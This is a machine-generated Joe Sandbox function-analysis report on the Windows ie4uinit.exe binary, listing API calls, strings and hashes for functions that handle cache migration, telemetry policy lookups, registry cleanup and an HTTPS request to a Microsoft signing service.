Function 00007FF6B52126F0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 130sleeplibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5215974: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B52159AD
Part of subcall function 00007FF6B5215974: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5211773), ref: 00007FF6B5215A1F
Part of subcall function 00007FF6B5215974: PostThreadMessageW.USER32 ref: 00007FF6B5215A39

InitOnceExecuteOnce.KERNEL32 ref: 00007FF6B5212736
GetTickCount.KERNEL32 ref: 00007FF6B5212759
GetShellWindow.USER32 ref: 00007FF6B5212761
GetTickCount.KERNEL32 ref: 00007FF6B521276C
GetTickCount.KERNEL32 ref: 00007FF6B5212781
Sleep.KERNEL32 ref: 00007FF6B521278E
Sleep.KERNEL32 ref: 00007FF6B521279B
SHChangeNotify.SHELL32 ref: 00007FF6B52127AE
CoInitializeEx.OLE32 ref: 00007FF6B52127CE
SHGetKnownFolderPath.SHELL32 ref: 00007FF6B52127F3
LoadLibraryExW.KERNEL32 ref: 00007FF6B521282A
GetProcAddress.KERNEL32 ref: 00007FF6B5212842
FreeLibrary.KERNEL32 ref: 00007FF6B5212871
CoTaskMemFree.OLE32 ref: 00007FF6B521287C
CoUninitialize.OLE32 ref: 00007FF6B5212882
Sleep.KERNEL32 ref: 00007FF6B5212894
GetShellWindow.USER32 ref: 00007FF6B521289A
SHGetFolderPathW.SHELL32 ref: 00007FF6B52128E2

Strings

migration\WininetPlugin.dll, xrefs: 00007FF6B5212806
In MigrateWinInetCache, xrefs: 00007FF6B52127B4
MigrateCacheForCurrentUser() returned: 0x%1!08lX!, xrefs: 00007FF6B521285B
In CmdClearIconCache, xrefs: 00007FF6B521270F
MigrateCacheForCurrentUser, xrefs: 00007FF6B5212838

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: CountSleepTick$FolderFreeLibraryMessageOncePathShellWindow$AddressChangeExecuteFormatInitInitializeKnownLoadLocalNotifyPostProcTaskThreadTimeUninitialize
String ID: In CmdClearIconCache$In MigrateWinInetCache$MigrateCacheForCurrentUser$MigrateCacheForCurrentUser() returned: 0x%1!08lX!$migration\WininetPlugin.dll
API String ID: 2252748604-3922426855
Opcode ID: b69869226a3ef770ee0022edec31f05946d86decc2ea3d510cced63e615b205a
Instruction ID: 42a6564bc59ce441cc86ff8f33b55ad719cdfca74ec935970d8b4e5ffded55ca
Opcode Fuzzy Hash: b69869226a3ef770ee0022edec31f05946d86decc2ea3d510cced63e615b205a
Instruction Fuzzy Hash: 25514F21A0AA5386FB249B2DEF546FA2264BF44F44F510135D70EC65AFDE3EED0AC640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5219604 Relevance: 38.7, APIs: 18, Strings: 4, Instructions: 218synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6B521963A

Part of subcall function 00007FF6B5211394: _vsnwprintf.MSVCRT ref: 00007FF6B52113D4

CreateMutexExW.KERNEL32 ref: 00007FF6B5219676
CloseHandle.KERNEL32 ref: 00007FF6B521969C
WaitForSingleObjectEx.KERNEL32 ref: 00007FF6B52196B8
ReleaseMutex.KERNEL32 ref: 00007FF6B521976A

Part of subcall function 00007FF6B5217700: GetLastError.KERNEL32 ref: 00007FF6B5217704

Strings

x, xrefs: 00007FF6B521964F
wil, xrefs: 00007FF6B5219706, 00007FF6B5219730, 00007FF6B521979C, 00007FF6B5219AFE
Local\SM0:%d:%d:%hs, xrefs: 00007FF6B5219645
internal\sdk\inc\wil\resource.h, xrefs: 00007FF6B52197F3

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Mutex$CloseCreateCurrentErrorHandleLastObjectProcessReleaseSingleWait_vsnwprintf
String ID: Local\SM0:%d:%d:%hs$internal\sdk\inc\wil\resource.h$wil$x
API String ID: 226711808-1706092632
Opcode ID: 65f9df8c3f67b3a05606eb12edd970345bbcf4e320ce94b9f7abb7beabd13ff8
Instruction ID: ea7dafc32a5a4888e7564774a7fc338453269f37691ab412179ae83d96e555ab
Opcode Fuzzy Hash: 65f9df8c3f67b3a05606eb12edd970345bbcf4e320ce94b9f7abb7beabd13ff8
Instruction Fuzzy Hash: EB919221A0A65246FB609F29EE413FA23A4AF44F80F044035DB4EC769EDF3DEC468B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5226478 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 501COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B52316EC: CoCreateInstance.OLE32(?,?,00000000,80004005,?,00007FF6B52264BB), ref: 00007FF6B523178A
Part of subcall function 00007FF6B52316EC: SysAllocString.OLEAUT32 ref: 00007FF6B52317CA

Part of subcall function 00007FF6B5225BE8: SysFreeString.OLEAUT32 ref: 00007FF6B5225C6C

SysFreeString.OLEAUT32 ref: 00007FF6B5226507
StrCmpNW.SHLWAPI ref: 00007FF6B5226573

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

SysFreeString.OLEAUT32 ref: 00007FF6B522671F
SysFreeString.OLEAUT32 ref: 00007FF6B5226823
SysStringLen.OLEAUT32 ref: 00007FF6B5226833
SysStringLen.OLEAUT32 ref: 00007FF6B522686E
SysFreeString.OLEAUT32 ref: 00007FF6B52268AB
SysFreeString.OLEAUT32 ref: 00007FF6B5226A06
SysStringLen.OLEAUT32 ref: 00007FF6B5226A58
SysFreeString.OLEAUT32 ref: 00007FF6B5226A67
SysFreeString.OLEAUT32 ref: 00007FF6B5226ADB
SysFreeString.OLEAUT32 ref: 00007FF6B5226B12
SysFreeString.OLEAUT32 ref: 00007FF6B5226B4D

Strings

publiccertificate, xrefs: 00007FF6B522658A
signvalue, xrefs: 00007FF6B52269C4
status, xrefs: 00007FF6B52264C5
thumbprint, xrefs: 00007FF6B52266DD
NOTFOUND, xrefs: 00007FF6B5226B23

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$Free$AllocCreateHeapInstanceProcess
String ID: NOTFOUND$publiccertificate$signvalue$status$thumbprint
API String ID: 3573149549-479019699
Opcode ID: b91c80a8bbe3a35f467edd1b762041284d9f9c077ea92dcf7737e05f05ced47a
Instruction ID: 8060ae82b576d64e8669204d1ba387b1a5ae3e145b6a64a89046db0000516609
Opcode Fuzzy Hash: b91c80a8bbe3a35f467edd1b762041284d9f9c077ea92dcf7737e05f05ced47a
Instruction Fuzzy Hash: 4232F92AB1AA4686EF148F69DA901BC2370FF44F94B544576CF0D97BAACF39E905C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5226DD0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 256memorynetworkfileCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF6B5226E04
SysStringLen.OLEAUT32 ref: 00007FF6B5226E19
HttpSendRequestW.WININET ref: 00007FF6B5226E2F
InternetReadFile.WININET ref: 00007FF6B5226EAB
GetLastError.KERNEL32 ref: 00007FF6B5226EB5
SysStringByteLen.OLEAUT32 ref: 00007FF6B5226F3E
SysAllocStringByteLen.OLEAUT32 ref: 00007FF6B5226F49
SysFreeString.OLEAUT32 ref: 00007FF6B5226F68
HttpQueryInfoW.WININET ref: 00007FF6B5226E5E

Part of subcall function 00007FF6B5211670: GetProcessHeap.KERNEL32 ref: 00007FF6B5211679

GetLastError.KERNEL32 ref: 00007FF6B5226F70
SysFreeString.OLEAUT32 ref: 00007FF6B5226F9A
SysAllocString.OLEAUT32 ref: 00007FF6B522706E
SysFreeString.OLEAUT32 ref: 00007FF6B522712C

Strings

&clientkey=, xrefs: 00007FF6B5227081
&mac=, xrefs: 00007FF6B52270AE
Content-Type: text/xml; charset=utf-8, xrefs: 00007FF6B5226DEF
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF6B5226FDD

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: String$AllocFree$ByteErrorHttpLast$FileHeapInfoInternetProcessQueryReadRequestSend
String ID: &clientkey=$&mac=$Content-Type: text/xml; charset=utf-8$https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP
API String ID: 1371129726-91891535
Opcode ID: be6571e6f4ac5afc3bbaab4d21deb99b18d299ff0e85d6098945e7c69abadc71
Instruction ID: ee61ee36a9611c2151e10e95c49c97f57f064f67d944459adffe060d16b8023b
Opcode Fuzzy Hash: be6571e6f4ac5afc3bbaab4d21deb99b18d299ff0e85d6098945e7c69abadc71
Instruction Fuzzy Hash: A4A17326F2A65286EB149B299E003F92294BF44F84F184435DF0E9779EDF7EEC468740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5214F7C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 206filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B5214D8C: CreateFileW.KERNEL32 ref: 00007FF6B5214DF6
Part of subcall function 00007FF6B5214D8C: GetLastError.KERNEL32 ref: 00007FF6B5214E05
Part of subcall function 00007FF6B5214D8C: GetLastError.KERNEL32 ref: 00007FF6B5214E15
Part of subcall function 00007FF6B5214D8C: ReadFile.KERNEL32 ref: 00007FF6B5214E5B
Part of subcall function 00007FF6B5214D8C: CloseHandle.KERNEL32 ref: 00007FF6B5214EA1
Part of subcall function 00007FF6B5214D8C: DeleteFileW.KERNEL32 ref: 00007FF6B5214EC9
Part of subcall function 00007FF6B5214D8C: GetLastError.KERNEL32 ref: 00007FF6B5214ED3
Part of subcall function 00007FF6B5214D8C: GetLastError.KERNEL32 ref: 00007FF6B5214EE3

CoInitializeEx.OLE32 ref: 00007FF6B5214FBB

Part of subcall function 00007FF6B5216A5C: #650.IERTUTIL ref: 00007FF6B5216A86

SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5215024
PathFileExistsW.SHLWAPI ref: 00007FF6B5215057
SetFileAttributesW.KERNEL32 ref: 00007FF6B521506A
DeleteFileW.KERNEL32 ref: 00007FF6B5215074
SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5215086
SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B52150DC
GetModuleHandleW.KERNEL32 ref: 00007FF6B52150E8
LoadStringW.USER32 ref: 00007FF6B5215103
#654.IERTUTIL ref: 00007FF6B5215148

Part of subcall function 00007FF6B5214720: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5214762

Part of subcall function 00007FF6B52147AC: SHGetKnownFolderPath.SHELL32(00007FF6B52125CC), ref: 00007FF6B52147D7
Part of subcall function 00007FF6B52147AC: CoTaskMemFree.OLE32 ref: 00007FF6B52147FA

Part of subcall function 00007FF6B521481C: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5214851
Part of subcall function 00007FF6B521481C: GetModuleHandleW.KERNEL32 ref: 00007FF6B5214898
Part of subcall function 00007FF6B521481C: LoadStringW.USER32 ref: 00007FF6B52148AE
Part of subcall function 00007FF6B521481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF6B52148B9
Part of subcall function 00007FF6B521481C: GetModuleHandleW.KERNEL32 ref: 00007FF6B52148F1
Part of subcall function 00007FF6B521481C: LoadStringW.USER32 ref: 00007FF6B5214907
Part of subcall function 00007FF6B521481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF6B5214912

PostMessageW.USER32 ref: 00007FF6B5215223

Part of subcall function 00007FF6B5216638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6B521B2D5), ref: 00007FF6B5216650

#281.IERTUTIL ref: 00007FF6B5215278
#282.IERTUTIL ref: 00007FF6B5215290
CoUninitialize.OLE32 ref: 00007FF6B52152D0

Part of subcall function 00007FF6B521A568: SetFileAttributesW.KERNEL32 ref: 00007FF6B521A66D
Part of subcall function 00007FF6B521A568: wcscat_s.MSVCRT ref: 00007FF6B521A72C
Part of subcall function 00007FF6B521A568: wcscat_s.MSVCRT ref: 00007FF6B521A743
Part of subcall function 00007FF6B521A568: FindFirstFileW.KERNEL32 ref: 00007FF6B521A755

Part of subcall function 00007FF6B521329C: memset.MSVCRT ref: 00007FF6B52132E2
Part of subcall function 00007FF6B521329C: GetVersionExA.KERNEL32 ref: 00007FF6B52132EC

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-00000000004, xrefs: 00007FF6B52152B8
Adobe\Flash Player\NativeCache, xrefs: 00007FF6B5215232
Software\Clients\StartMenuInternet, xrefs: 00007FF6B5215213
Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-00000000004, xrefs: 00007FF6B52152C4

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Path$File$Folder$Special$ErrorHandleLast$LoadModuleString$AttributesDeleteExtensionOnceRemovewcscat_s$#281#282#650#654CloseCreateExecuteExistsFindFirstFreeInitInitializeKnownMessagePostReadTaskUninitializeVersionmemset
String ID: Adobe\Flash Player\NativeCache$Software\Clients\StartMenuInternet$Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-00000000004$Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-00000000004
API String ID: 3202643428-768262421
Opcode ID: 35c2ca766d56c54afd8864ad09956f66751ba0359b948913f5cdf325deef9939
Instruction ID: 6b739619babc2969c4fa264bfd999760d17b806aa23b6aa0d35bb8356f97f5bb
Opcode Fuzzy Hash: 35c2ca766d56c54afd8864ad09956f66751ba0359b948913f5cdf325deef9939
Instruction Fuzzy Hash: 3DA19432B1969246E720AF69DE416EA2760FF44F44F401035EB4E97A9EDF3EE905CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522FDB4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 208librarynativeloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF6B522FE2D
GetProcAddress.KERNEL32 ref: 00007FF6B522FE45

Part of subcall function 00007FF6B522F988: RegGetValueW.ADVAPI32 ref: 00007FF6B522F9C1

NtQueryLicenseValue.NTDLL ref: 00007FF6B522FE71
FreeLibrary.KERNEL32 ref: 00007FF6B522FEE1
NtQueryLicenseValue.NTDLL ref: 00007FF6B523008E

Strings

AllowTelemetry_PolicyManager, xrefs: 00007FF6B522FFA1, 00007FF6B522FFDE
ntdll.dll, xrefs: 00007FF6B522FE11
NtQuerySecurityPolicy, xrefs: 00007FF6B522FE3B
AllowTelemetry, xrefs: 00007FF6B522FF0D, 00007FF6B522FF43, 00007FF6B5230040
Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection, xrefs: 00007FF6B523004E
Software\Policies\Microsoft\Windows\DataCollection, xrefs: 00007FF6B522FF1B, 00007FF6B522FFAF
OptInLevel, xrefs: 00007FF6B522FDFA
Reserved.PlatformSigned, xrefs: 00007FF6B522FDD0
CodeIntegrity.Telemetry, xrefs: 00007FF6B522FDE5

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Value$LibraryLicenseQuery$AddressFreeLoadProc
String ID: AllowTelemetry$AllowTelemetry_PolicyManager$CodeIntegrity.Telemetry$NtQuerySecurityPolicy$OptInLevel$Reserved.PlatformSigned$Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection$Software\Policies\Microsoft\Windows\DataCollection$ntdll.dll
API String ID: 2720952003-2205401507
Opcode ID: 887f4a608641cc812afca260d9319305be8702d0abd091e01659f4e196a8df75
Instruction ID: 6eaf17b44836f97bb43b1cfdba00f75070bf1051ad0329a489bc1c5197390609
Opcode Fuzzy Hash: 887f4a608641cc812afca260d9319305be8702d0abd091e01659f4e196a8df75
Instruction Fuzzy Hash: 4B917076A1A7828EF725CF68DA402E937A0BB08B54F504135DF4D8369EEF3AD945C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B5226BB4 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130networkCOMMON

Download Yara Rule

APIs

InternetCanonicalizeUrlW.WININET ref: 00007FF6B5226C12
memset.MSVCRT ref: 00007FF6B5226C31
InternetCrackUrlW.WININET ref: 00007FF6B5226C79
InternetOpenW.WININET ref: 00007FF6B5226C9B
InternetConnectW.WININET ref: 00007FF6B5226CD7
HttpOpenRequestW.WININET ref: 00007FF6B5226D22
InternetCloseHandle.WININET ref: 00007FF6B5226D48
GetLastError.KERNEL32 ref: 00007FF6B5226D50
InternetCloseHandle.WININET ref: 00007FF6B5226D67

Part of subcall function 00007FF6B5226DD0: SysAllocString.OLEAUT32 ref: 00007FF6B5226E04
Part of subcall function 00007FF6B5226DD0: SysStringLen.OLEAUT32 ref: 00007FF6B5226E19
Part of subcall function 00007FF6B5226DD0: HttpSendRequestW.WININET ref: 00007FF6B5226E2F
Part of subcall function 00007FF6B5226DD0: HttpQueryInfoW.WININET ref: 00007FF6B5226E5E
Part of subcall function 00007FF6B5226DD0: InternetReadFile.WININET ref: 00007FF6B5226EAB
Part of subcall function 00007FF6B5226DD0: GetLastError.KERNEL32 ref: 00007FF6B5226EB5
Part of subcall function 00007FF6B5226DD0: SysFreeString.OLEAUT32 ref: 00007FF6B5226F68
Part of subcall function 00007FF6B5226DD0: SysFreeString.OLEAUT32 ref: 00007FF6B5226F9A

GetLastError.KERNEL32 ref: 00007FF6B5226D6F
InternetCloseHandle.WININET ref: 00007FF6B5226D86
GetLastError.KERNEL32(?,00007FF6B5227274,?,?,?,?,?,?,?,?,?,?,?,?,?,80070057), ref: 00007FF6B5226D8E

Strings

IE_EUPP, xrefs: 00007FF6B5226C92
POST, xrefs: 00007FF6B5226CFA

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Internet$ErrorLastString$CloseHandleHttp$FreeOpenRequest$AllocCanonicalizeConnectCrackFileInfoQueryReadSendmemset
String ID: IE_EUPP$POST
API String ID: 1847757306-3869093421
Opcode ID: 3aa75398a8373df8bf6d18cd5c62d5d95269c300dcac9ed293b90aaa8e9a243e
Instruction ID: 234c6e7bbce00fdab571a15721b73e287aefa546df8ad4e84562cf1b6b2f7570
Opcode Fuzzy Hash: 3aa75398a8373df8bf6d18cd5c62d5d95269c300dcac9ed293b90aaa8e9a243e
Instruction Fuzzy Hash: 3F51B536A1A7918AE720DF69AE446EA73A4FB48B84F400135DF4D87B59DF3CE906C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B522EFAC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94encryptionCOMMON

Download Yara Rule

APIs

CryptCreateHash.ADVAPI32(?,?,00000000,00007FF6B522EEDA), ref: 00007FF6B522EFE6
memset.MSVCRT ref: 00007FF6B522EFFF
CryptSetHashParam.ADVAPI32 ref: 00007FF6B522F01D
CryptHashData.ADVAPI32 ref: 00007FF6B522F035
CryptGetHashParam.ADVAPI32 ref: 00007FF6B522F05E
GetLastError.KERNEL32 ref: 00007FF6B522F073
GetLastError.KERNEL32 ref: 00007FF6B522F087
GetLastError.KERNEL32 ref: 00007FF6B522F096
CryptDestroyHash.ADVAPI32 ref: 00007FF6B522F0AF
GetLastError.KERNEL32(?,?,00000000,00007FF6B522EEDA), ref: 00007FF6B522F0B7
GetLastError.KERNEL32(?,?,00000000,00007FF6B522EEDA), ref: 00007FF6B522F0CB
GetLastError.KERNEL32(?,?,00000000,00007FF6B522EEDA), ref: 00007FF6B522F0DA

Strings

, xrefs: 00007FF6B522F068

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CryptHash$Param$CreateDataDestroymemset
String ID:
API String ID: 3852012595-3916222277
Opcode ID: 3bbd2b993c606e934eca1004046eac300e38a0ac95120dbaee498dca69c85d54
Instruction ID: 6e400cfd171dc1df86bc265dd92ea1f4368c7d3945298ac79d7a9afe7a5e2ab0
Opcode Fuzzy Hash: 3bbd2b993c606e934eca1004046eac300e38a0ac95120dbaee498dca69c85d54
Instruction Fuzzy Hash: CD41C461B196868AE7608B6ADE857A933A4FF84F80F540134DB4EC3659DF3DED468700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6B52153B8 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 179registrywindowCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B52125CC), ref: 00007FF6B52153F1
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B52155B6
RegOpenKeyExW.ADVAPI32 ref: 00007FF6B52155E9
RegDeleteKeyW.ADVAPI32 ref: 00007FF6B5215608
PostMessageW.USER32 ref: 00007FF6B521562A
SHChangeNotify.SHELL32 ref: 00007FF6B5215642
CoUninitialize.OLE32 ref: 00007FF6B5215648

Part of subcall function 00007FF6B5213578: GetVersionExW.KERNEL32 ref: 00007FF6B521359E

Part of subcall function 00007FF6B5213738: RegCreateKeyExW.ADVAPI32 ref: 00007FF6B521378E
Part of subcall function 00007FF6B5213738: RegSetValueW.ADVAPI32 ref: 00007FF6B5213835
Part of subcall function 00007FF6B5213738: RegCloseKey.ADVAPI32 ref: 00007FF6B5213840

Part of subcall function 00007FF6B5214720: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5214762

Part of subcall function 00007FF6B52147AC: SHGetKnownFolderPath.SHELL32(00007FF6B52125CC), ref: 00007FF6B52147D7
Part of subcall function 00007FF6B52147AC: CoTaskMemFree.OLE32 ref: 00007FF6B52147FA

Part of subcall function 00007FF6B521481C: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF6B5214851
Part of subcall function 00007FF6B521481C: GetModuleHandleW.KERNEL32 ref: 00007FF6B5214898
Part of subcall function 00007FF6B521481C: LoadStringW.USER32 ref: 00007FF6B52148AE
Part of subcall function 00007FF6B521481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF6B52148B9
Part of subcall function 00007FF6B521481C: GetModuleHandleW.KERNEL32 ref: 00007FF6B52148F1
Part of subcall function 00007FF6B521481C: LoadStringW.USER32 ref: 00007FF6B5214907
Part of subcall function 00007FF6B521481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF6B5214912

Part of subcall function 00007FF6B5215B2C: SHCreateItemFromParsingName.SHELL32 ref: 00007FF6B5215B40
Part of subcall function 00007FF6B5215B2C: CoCreateInstance.OLE32 ref: 00007FF6B5215B6A

Strings

shell:::{871C5380-42A0-1069-A2EA-08002B30309D}, xrefs: 00007FF6B5215554
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}, xrefs: 00007FF6B5215599, 00007FF6B52155DF
Software\Clients\StartMenuInternet, xrefs: 00007FF6B521561A
Locale, xrefs: 00007FF6B52155C4
Version, xrefs: 00007FF6B52155F7

Memory Dump Source

Source File: 00000007.00000002.327205086.00007FF6B5211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6B5210000, based on PE: true

Associated: 00000007.00000002.327198325.00007FF6B5210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327227228.00007FF6B5235000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327237954.00007FF6B5244000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327243311.00007FF6B5246000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.327246966.00007FF6B5249000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff6b5210000_ie4uinit.jbxd

Similarity

API ID: Path$CreateFolder$ExtensionHandleLoadModuleOpenRemoveSpecialString$ChangeCloseDeleteFreeFromInitializeInstanceItemKnownMessageNameNotifyParsingPostTaskUninitializeValueVersion
